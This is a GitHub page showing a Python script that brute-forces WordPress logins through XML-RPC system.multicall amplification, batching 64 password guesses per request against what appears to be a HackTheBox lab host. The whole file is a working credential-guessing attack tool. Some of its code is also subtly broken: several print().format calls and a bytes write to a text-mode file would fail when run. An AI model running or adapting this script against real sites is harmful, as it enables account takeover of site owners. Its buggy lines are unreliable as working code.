-
Notifications
You must be signed in to change notification settings - Fork 178
/
xmlrpc_amplif_bruteforce.py
127 lines (104 loc) · 3.74 KB
/
xmlrpc_amplif_bruteforce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/usr/bin/env python3
#
# XML-RPC bruteforce amplification attack
# https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/
import requests
output = open("./output.txt", "w")
passwords = open(
"/Users/bl4de/hacking/dictionaries/100000_passwords.txt").readlines()
usernames = open(
"/Users/bl4de/hacking/dictionaries/SecLists/Usernames/top-usernames-shortlist.txt").readlines()
host = "metapress.htb"
# headers used in POST requests
h = {
"Host": host,
"User-Agent": "HackerOne/bl4de"
}
index = 0
# XMLRPC url
url = "http://metapress.htb/xmlrpc.php"
print("[+] building payload...")
# building payload for system.multicall wp.getUsersBlogs
payload_start = """
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
"""
payload_end = """
</data>
</array>
</value>
</param>
</params>
</methodCall>
"""
total = 0
def send_request_with_username(username, passwords):
global total
payload = ""
username = username.strip()
for password in passwords:
payload = payload + """
<value>
<struct>
<member>
<name>methodName</name>
<value>
<string>wp.getUsersBlogs</string>
</value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value>
<array>
<data>
<value>
<string>{}</string>
</value>
<value>
<string>{}</string>
</value>
</data>
</array>
</value>
</data>
</array>
</value>
</member>
</struct>
</value>
""".format(username, password.strip())
total = total + 1
print("\n[+] payload for {} ready ({} KB)...".format(username, len(payload)/64))
payload = payload_start + payload + payload_end
# print(payload)
print("[+] sending POST request with payload... ({} credentials in total checked)".format(total))
resp = requests.post(url, headers=h, data=payload)
if resp.status_code == 200:
print("[+] response HTTP 200 OK received, analysing results...")
# p0wned. This is the end :P
if b"isAdmin" in resp.content:
print("[+] SUCCESS !!! Matching username/password for {} found!, please review response content for details...").format(username)
output.write(resp.content)
exit(0)
else:
print(
"[-] no matching username/password for {} found... :(").format(username)
output.write(resp.content)
else:
print("[-] something wrong, {} HTTP Response form{} received: \n\n").format(
resp.status_code, username)
print(resp.content)
for username in usernames:
for i in range(0, 100000, 64):
password = passwords[i:i+64]
send_request_with_username(username, password)
print("[+] done...\n\n")